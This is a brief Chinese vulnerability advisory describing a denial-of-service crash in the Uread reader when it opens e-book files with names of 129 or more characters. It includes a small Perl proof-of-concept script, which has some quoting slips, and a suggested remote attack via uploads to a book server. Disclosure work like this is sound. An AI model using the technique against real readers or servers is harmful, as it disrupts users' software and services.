Uread阅读器拒绝服务漏洞的分析与解决
发布时间:2016-02-19 来源:查字典编辑
摘要:Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动...
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。
测试证明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile "a"x129.epub------n";
open(TESTFILE, ">$filename.epub");
sleep
(3);
close(TESTFILE);
print "------Complete--n";
exit
(1);
-----------------------------------------------------------
修复方案:
目前厂商还没有提供补丁或者升级程序。